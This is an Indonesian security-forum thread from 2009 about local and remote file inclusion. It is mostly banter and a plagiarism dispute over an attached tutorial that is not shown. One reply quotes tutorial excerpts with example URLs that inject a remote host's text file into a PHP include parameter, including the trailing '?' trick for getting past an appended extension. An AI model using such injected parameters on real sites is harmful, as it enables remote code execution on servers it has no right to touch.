Teori dasar LFI vs RFI

Post by **abah** » Sun Oct 11, 2009 1:29 pm

berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat ya

Post by **shad.hckr** » Mon Oct 12, 2009 9:33 am

tambah koleksi kata mutiara by abah..

@atas..
perasaan dari kemaren ngebet banget ma Tembak IP.. mau buat nembak siapa pak?? cewek ya?? heuheuheuheu..

xymcrush17 · Post by **xymcrush17** » Mon Oct 12, 2009 7:56 pm

thank2 om. sharing nya.
@om shad pakabar?? lama gag ketemu neh..heheh

Post by **shad.hckr** » Tue Oct 13, 2009 7:01 pm

@xmycrush..
wkwkwk.. pak kok menghilang dari peredaran?? kena garukan Satpol PP ya?? wkakakaka..

b0c4h · Post by **b0c4h** » Sat Oct 24, 2009 2:25 am

abah.....cucu ijin dunlut file'a ya.....

buat simulasi di localhost bisa kan ya bah.....???

Post by **abah** » Sat Oct 24, 2009 8:14 pm

b0c4h wrote:abah.....cucu ijin dunlut file'a ya.....

buat simulasi di localhost bisa kan ya bah.....???

bs dan di saranakn buat trik dulu di localhost baru di target pentes

arira · Post by **arira** » Wed Oct 28, 2009 2:32 pm

bro abah, ini artikelnya bikinan abah sendiri bukan ya?? kok sembarangan main edit

abah wrote:berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat ya

ini adalah cuplikan dari tutorial yang abah "buat"

eksploitasi RFI
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
dan isi dari abah.txt adalah

maka page tadi akan menampilkan tulisan “HACKED BY KayLa”.
ini terjadi karena isi dari abah.txt dieksekusi oleh server.

.......

misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.ummiseksi.com/abah.txt);
==> maka ./http://www.ummiseksi.com/abah.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.ummiseksi.com/abah.txt tidak ada dalam server tersebut.

exploitasi RFI:
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt?
maka $page = $_GET[page] = http://www.ummiseksi.com/abah.txt?.php
nah .php oleh server akan diabaikan.

bandingkan dengan ini

misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.hacker.com/hack.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.hacker.com/hack.txt);
==> maka ./http://www.hacker.com/hack.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.hacker.com/hack.txt tidak ada dalam server tersebut.

tuk link artikel yg asli (belum diedit, yg asli dari cupu-zone.com, tapi situs tersebut sudah gak ada sekarang)
1. http://jeky466.blogsome.com/2008/05/26/about-lfirfi/
2. http://www.jasakom.com/forum/viewtopic. ... 6&start=15

tuk temen2 yang lain, liat yg ini juga ya
http://xcode.or.id/forum2/viewtopic.php ... 30#p214139

maaf bro abah, bukan maksud saya mencari2 kesalahan sampeyan, tapi sayang sekali dua postingan tersebut saya pernah baca dan kenal betul siapa penulis/pembuat aslinya....peace bro

Post by **abah** » Wed Oct 28, 2009 5:39 pm

arira wrote:bro abah, ini artikelnya bikinan abah sendiri bukan ya?? kok sembarangan main edit

abah wrote:berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat ya
ini adalah cuplikan dari tutorial yang abah "buat"
eksploitasi RFI
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
dan isi dari abah.txt adalah

maka page tadi akan menampilkan tulisan “HACKED BY KayLa”.
ini terjadi karena isi dari abah.txt dieksekusi oleh server.

.......

misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.ummiseksi.com/abah.txt);
==> maka ./http://www.ummiseksi.com/abah.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.ummiseksi.com/abah.txt tidak ada dalam server tersebut.

exploitasi RFI:
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt?
maka $page = $_GET[page] = http://www.ummiseksi.com/abah.txt?.php
nah .php oleh server akan diabaikan.
bandingkan dengan ini
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.hacker.com/hack.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.hacker.com/hack.txt);
==> maka ./http://www.hacker.com/hack.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.hacker.com/hack.txt tidak ada dalam server tersebut.
tuk link artikel yg asli (belum diedit, yg asli dari cupu-zone.com, tapi situs tersebut sudah gak ada sekarang)
1. http://jeky466.blogsome.com/2008/05/26/about-lfirfi/
2. http://www.jasakom.com/forum/viewtopic. ... 6&start=15

tuk temen2 yang lain, liat yg ini juga ya
http://xcode.or.id/forum2/viewtopic.php ... 30#p214139

maaf bro abah, bukan maksud saya mencari2 kesalahan sampeyan, tapi sayang sekali dua postingan tersebut saya pernah baca dan kenal betul siapa penulis/pembuat aslinya....peace bro

maksdunya anda apa

apa emang penulis yang anda kenal emang bisa melakukan itu aja...sorry bro
OON gini bisa juga om kalau masalah gituan nggak usah di samakan dengan penulis aslina
mungkin om dan penulisna hebat dan mungkin pembuat tulisan itu tapi hargai ane yang bodoh yang pengen juga seperti anda yang hebat dan penulis yang anda kenal

btw thansk kritikanna master

*Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

Teori dasar LFI vs RFI

Teori dasar LFI vs RFI

Re: Teori dasar LFI vs RFI

Re: Teori dasar LFI vs RFI

Re: Teori dasar LFI vs RFI

Re: Teori dasar LFI vs RFI

Re: Teori dasar LFI vs RFI

Re: Teori dasar LFI vs RFI

Re: Teori dasar LFI vs RFI